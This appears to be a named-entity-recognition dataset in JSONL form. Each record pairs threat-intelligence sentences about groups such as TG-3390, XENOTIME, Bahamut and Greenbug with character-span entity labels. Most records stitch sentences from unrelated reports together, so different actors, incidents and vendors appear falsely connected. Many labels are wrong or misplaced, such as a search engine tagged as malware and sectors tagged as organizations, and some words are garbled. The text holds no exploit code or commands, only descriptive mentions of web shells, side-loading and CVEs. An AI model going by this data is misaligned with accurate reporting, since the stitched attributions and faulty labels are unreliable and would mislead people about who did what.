{"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive\u2014or even destructive\u2014event .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 55, "end": 62, "label": "Organization"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 211, "end": 219, "label": "Organization"}]}
{"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": [{"start": 166, "end": 174, "label": "Organization"}, {"start": 282, "end": 298, "label": "Organization"}]}
{"text": "As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": [{"start": 177, "end": 184, "label": "Organization"}, {"start": 215, "end": 221, "label": "Malware"}, {"start": 265, "end": 285, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}]}
{"text": "This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": [{"start": 220, "end": 227, "label": "Organization"}, {"start": 260, "end": 266, "label": "Malware"}, {"start": 318, "end": 338, "label": "Organization"}, {"start": 364, "end": 374, "label": "Organization"}]}
{"text": "Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data . Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 57, "end": 67, "label": "Organization"}, {"start": 194, "end": 200, "label": "Organization"}, {"start": 410, "end": 428, "label": "Organization"}]}
{"text": "LAS VEGAS\u2014Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 .", "spans": [{"start": 67, "end": 83, "label": "Organization"}, {"start": 245, "end": 252, "label": "Organization"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 393, "end": 406, "label": "Malware"}, {"start": 407, "end": 414, "label": "Malware"}]}
{"text": "Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network . Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media .", "spans": [{"start": 278, "end": 291, "label": "Malware"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 453, "end": 460, "label": "Organization"}, {"start": 520, "end": 525, "label": "Organization"}]}
{"text": "Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 199, "end": 206, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 332, "end": 338, "label": "Malware"}, {"start": 355, "end": 361, "label": "Organization"}, {"start": 438, "end": 446, "label": "Organization"}]}
{"text": "However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 154, "end": 160, "label": "Organization"}, {"start": 237, "end": 245, "label": "Organization"}]}
{"text": "The primary goal of these attacks was likely to find code-signing certificates for signing future malware . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology .", "spans": [{"start": 349, "end": 356, "label": "Organization"}, {"start": 361, "end": 368, "label": "Organization"}, {"start": 402, "end": 408, "label": "Malware"}]}
{"text": "ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON .", "spans": [{"start": 43, "end": 63, "label": "System"}, {"start": 264, "end": 274, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}, {"start": 353, "end": 363, "label": "Organization"}, {"start": 386, "end": 392, "label": "Malware"}]}
{"text": "ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities . My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move aACT from it in subsequent reporting .", "spans": [{"start": 150, "end": 157, "label": "Organization"}, {"start": 234, "end": 238, "label": "Organization"}, {"start": 259, "end": 269, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}]}
{"text": "A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": [{"start": 78, "end": 93, "label": "Organization"}, {"start": 146, "end": 154, "label": "Organization"}, {"start": 299, "end": 320, "label": "Organization"}]}
{"text": "Dragos does not corroborate nor conduct political attribution to threat activity . Of note , this methodology of naming abstracts aACT the \" who \" element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 225, "end": 245, "label": "Organization"}]}
{"text": "As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities . Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same phenomena , yet at the same time appear different .", "spans": [{"start": 144, "end": 156, "label": "Organization"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 333, "end": 339, "label": "Organization"}]}
{"text": "The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": [{"start": 28, "end": 38, "label": "Organization"}, {"start": 272, "end": 275, "label": "Organization"}, {"start": 297, "end": 304, "label": "Indicator"}]}
{"text": "Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": [{"start": 40, "end": 45, "label": "Organization"}, {"start": 156, "end": 172, "label": "System"}, {"start": 224, "end": 227, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}]}
{"text": "The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": [{"start": 144, "end": 172, "label": "Organization"}, {"start": 187, "end": 194, "label": "Organization"}, {"start": 237, "end": 240, "label": "Organization"}, {"start": 316, "end": 333, "label": "Organization"}]}
{"text": "We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": [{"start": 225, "end": 228, "label": "Organization"}, {"start": 255, "end": 262, "label": "Organization"}]}
{"text": "Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 69, "end": 84, "label": "System"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 266, "end": 275, "label": "Organization"}, {"start": 301, "end": 316, "label": "Malware"}, {"start": 321, "end": 338, "label": "Malware"}]}
{"text": "One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . CTU researchers have evidence that the TG-3390 compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": [{"start": 184, "end": 203, "label": "System"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 245, "end": 252, "label": "Organization"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 349, "end": 358, "label": "Organization"}, {"start": 371, "end": 390, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}, {"start": 408, "end": 418, "label": "Organization"}, {"start": 421, "end": 427, "label": "Organization"}, {"start": 434, "end": 449, "label": "Organization"}, {"start": 454, "end": 463, "label": "Organization"}, {"start": 470, "end": 475, "label": "Organization"}]}
{"text": "Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": [{"start": 182, "end": 186, "label": "Malware"}, {"start": 189, "end": 196, "label": "Organization"}]}
{"text": "Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations \u2013 not destructive attacks or fraud . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 135, "end": 142, "label": "Organization"}]}
{"text": "Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . CTU researchers have evidence that the threat group compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": [{"start": 254, "end": 264, "label": "Organization"}, {"start": 338, "end": 341, "label": "Organization"}, {"start": 457, "end": 470, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}, {"start": 508, "end": 527, "label": "Organization"}, {"start": 532, "end": 542, "label": "Organization"}, {"start": 545, "end": 555, "label": "Organization"}, {"start": 558, "end": 564, "label": "Organization"}, {"start": 571, "end": 586, "label": "Organization"}, {"start": 591, "end": 600, "label": "Organization"}, {"start": 607, "end": 612, "label": "Organization"}]}
{"text": "Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": [{"start": 176, "end": 183, "label": "Organization"}]}
{"text": "Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": [{"start": 0, "end": 8, "label": "System"}]}
{"text": "Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server . After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims .", "spans": [{"start": 7, "end": 15, "label": "System"}, {"start": 167, "end": 174, "label": "Organization"}, {"start": 188, "end": 208, "label": "Malware"}]}
{"text": "They have different functions and ways of spreading , but the same purpose \u2014 to steal money from the accounts of businesses . CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control .", "spans": [{"start": 113, "end": 123, "label": "Organization"}, {"start": 126, "end": 129, "label": "Organization"}, {"start": 175, "end": 182, "label": "Organization"}]}
{"text": "At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments \u2014 to the tune of at least $150,000 per hit . TG-3390 uses the PlugX remote access tool .", "spans": [{"start": 91, "end": 115, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}, {"start": 178, "end": 202, "label": "Malware"}]}
{"text": "Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 216, "end": 235, "label": "Organization"}, {"start": 240, "end": 261, "label": "Organization"}]}
{"text": "Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": [{"start": 163, "end": 182, "label": "Malware"}]}
{"text": "Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system . Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": [{"start": 138, "end": 141, "label": "Organization"}, {"start": 195, "end": 212, "label": "Organization"}]}
{"text": "In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": [{"start": 168, "end": 171, "label": "Organization"}, {"start": 209, "end": 219, "label": "Organization"}, {"start": 257, "end": 269, "label": "Organization"}, {"start": 387, "end": 406, "label": "Organization"}]}
{"text": "Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's . CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": [{"start": 171, "end": 180, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 400, "end": 419, "label": "Organization"}]}
{"text": "Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions \u2014 which are often not designed to handle the persistent and sophisticated threats detailed in this blog \u2014 ineffective . TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 33, "end": 42, "label": "Organization"}, {"start": 282, "end": 289, "label": "Organization"}]}
{"text": "In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": [{"start": 235, "end": 242, "label": "Malware"}]}
{"text": "To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": [{"start": 148, "end": 155, "label": "Organization"}, {"start": 204, "end": 207, "label": "Organization"}, {"start": 262, "end": 270, "label": "Vulnerability"}]}
{"text": "Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 85, "end": 107, "label": "System"}, {"start": 110, "end": 122, "label": "System"}, {"start": 125, "end": 141, "label": "System"}, {"start": 144, "end": 171, "label": "System"}, {"start": 174, "end": 187, "label": "System"}, {"start": 217, "end": 221, "label": "Malware"}, {"start": 266, "end": 273, "label": "Organization"}, {"start": 293, "end": 299, "label": "System"}]}
{"text": "Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 11, "end": 25, "label": "System"}, {"start": 42, "end": 48, "label": "Organization"}, {"start": 202, "end": 205, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}]}
{"text": "After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs .", "spans": [{"start": 291, "end": 294, "label": "Organization"}, {"start": 319, "end": 326, "label": "Organization"}, {"start": 428, "end": 450, "label": "Organization"}, {"start": 456, "end": 467, "label": "Organization"}]}
{"text": "Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions .", "spans": [{"start": 313, "end": 316, "label": "Organization"}, {"start": 354, "end": 361, "label": "Organization"}]}
{"text": "Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": [{"start": 285, "end": 288, "label": "Organization"}, {"start": 319, "end": 326, "label": "Organization"}, {"start": 369, "end": 395, "label": "Organization"}]}
{"text": "Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 112, "end": 122, "label": "Organization"}, {"start": 291, "end": 294, "label": "System"}, {"start": 373, "end": 376, "label": "Organization"}, {"start": 434, "end": 451, "label": "Malware"}, {"start": 468, "end": 477, "label": "Organization"}, {"start": 533, "end": 562, "label": "System"}, {"start": 565, "end": 568, "label": "System"}]}
{"text": "Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 273, "end": 280, "label": "Organization"}]}
{"text": "This APT group usually carries out target attacks against government agencies to steal sensitive information . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S .", "spans": [{"start": 58, "end": 77, "label": "Organization"}, {"start": 111, "end": 118, "label": "Organization"}, {"start": 206, "end": 208, "label": "System"}, {"start": 224, "end": 226, "label": "Indicator"}]}
{"text": "All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": [{"start": 215, "end": 217, "label": "System"}, {"start": 273, "end": 280, "label": "Organization"}]}
{"text": "With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": [{"start": 5, "end": 11, "label": "System"}, {"start": 62, "end": 66, "label": "Organization"}, {"start": 70, "end": 73, "label": "System"}, {"start": 78, "end": 93, "label": "System"}, {"start": 121, "end": 130, "label": "Malware"}]}
{"text": "During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": [{"start": 190, "end": 193, "label": "Organization"}]}
{"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file .", "spans": [{"start": 36, "end": 49, "label": "Organization"}, {"start": 303, "end": 306, "label": "Organization"}, {"start": 342, "end": 350, "label": "Malware"}, {"start": 417, "end": 438, "label": "Malware"}]}
{"text": "In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS . CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) .", "spans": [{"start": 117, "end": 120, "label": "Organization"}]}
{"text": "Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . TG-3390 sends spearphishing emails with ZIP archive attachments .", "spans": [{"start": 178, "end": 184, "label": "System"}, {"start": 192, "end": 196, "label": "System"}, {"start": 199, "end": 206, "label": "Organization"}, {"start": 227, "end": 233, "label": "System"}]}
{"text": "Cadelle 's threats are capable of opening a back door and stealing information from victims' computers . CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": [{"start": 105, "end": 108, "label": "Organization"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 337, "end": 344, "label": "Vulnerability"}]}
{"text": "These threats are capable of opening a back door and stealing information from victims' computers . TG-3390 actors have used Java exploits in their SWCs .", "spans": [{"start": 100, "end": 107, "label": "Organization"}, {"start": 125, "end": 129, "label": "System"}, {"start": 148, "end": 152, "label": "Malware"}]}
{"text": "Callisto Group appears to be intelligence gathering related to European foreign and security policy . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 118, "end": 125, "label": "Organization"}, {"start": 140, "end": 153, "label": "Vulnerability"}, {"start": 221, "end": 241, "label": "Malware"}, {"start": 248, "end": 261, "label": "Vulnerability"}, {"start": 283, "end": 288, "label": "Malware"}, {"start": 389, "end": 396, "label": "Vulnerability"}]}
{"text": "Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": [{"start": 25, "end": 39, "label": "Organization"}, {"start": 186, "end": 196, "label": "System"}, {"start": 284, "end": 287, "label": "Organization"}, {"start": 302, "end": 309, "label": "Organization"}, {"start": 323, "end": 359, "label": "Malware"}, {"start": 392, "end": 395, "label": "System"}]}
{"text": "Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 204, "end": 217, "label": "Vulnerability"}, {"start": 285, "end": 305, "label": "Malware"}, {"start": 312, "end": 325, "label": "Vulnerability"}, {"start": 347, "end": 352, "label": "Malware"}, {"start": 453, "end": 460, "label": "Vulnerability"}]}
{"text": "On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf . TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": [{"start": 13, "end": 27, "label": "Organization"}, {"start": 94, "end": 100, "label": "System"}, {"start": 103, "end": 106, "label": "System"}, {"start": 116, "end": 123, "label": "System"}, {"start": 196, "end": 203, "label": "Organization"}, {"start": 337, "end": 340, "label": "System"}]}
{"text": "It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": [{"start": 26, "end": 52, "label": "System"}, {"start": 183, "end": 202, "label": "Organization"}, {"start": 239, "end": 242, "label": "Organization"}, {"start": 273, "end": 290, "label": "Organization"}, {"start": 312, "end": 321, "label": "Organization"}]}
{"text": "t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system .", "spans": [{"start": 25, "end": 51, "label": "System"}, {"start": 182, "end": 201, "label": "Organization"}, {"start": 288, "end": 293, "label": "Malware"}, {"start": 298, "end": 309, "label": "Malware"}]}
{"text": "In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": [{"start": 22, "end": 33, "label": "System"}, {"start": 118, "end": 121, "label": "Organization"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 181, "end": 190, "label": "Organization"}]}
{"text": "According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website . TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter .", "spans": [{"start": 271, "end": 304, "label": "Organization"}, {"start": 307, "end": 310, "label": "Organization"}, {"start": 323, "end": 330, "label": "Organization"}, {"start": 356, "end": 373, "label": "Malware"}]}
{"text": "The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": [{"start": 30, "end": 54, "label": "System"}, {"start": 167, "end": 177, "label": "Malware"}]}
{"text": "We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": [{"start": 186, "end": 189, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}]}
{"text": "As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": [{"start": 283, "end": 285, "label": "System"}, {"start": 299, "end": 301, "label": "Indicator"}]}
{"text": "Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": [{"start": 17, "end": 35, "label": "System"}, {"start": 169, "end": 186, "label": "Malware"}]}
{"text": "The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": [{"start": 4, "end": 21, "label": "Organization"}, {"start": 91, "end": 98, "label": "System"}, {"start": 160, "end": 177, "label": "Malware"}, {"start": 257, "end": 264, "label": "Organization"}]}
{"text": "he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name .", "spans": [{"start": 3, "end": 20, "label": "Organization"}, {"start": 90, "end": 97, "label": "System"}, {"start": 241, "end": 260, "label": "Malware"}]}
{"text": "In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access .", "spans": [{"start": 144, "end": 150, "label": "System"}, {"start": 165, "end": 191, "label": "System"}, {"start": 269, "end": 272, "label": "Organization"}]}
{"text": "To control the full operation , MoneyTaker uses a Pentest framework Server . TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible Web shell rather than HTTPBrowser or PlugX .", "spans": [{"start": 32, "end": 42, "label": "Organization"}, {"start": 50, "end": 74, "label": "System"}, {"start": 77, "end": 84, "label": "Organization"}, {"start": 128, "end": 147, "label": "Malware"}, {"start": 228, "end": 237, "label": "System"}, {"start": 250, "end": 261, "label": "Malware"}, {"start": 265, "end": 270, "label": "Malware"}]}
{"text": "At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation . Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": [{"start": 125, "end": 140, "label": "Organization"}]}
{"text": "After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication .", "spans": []}
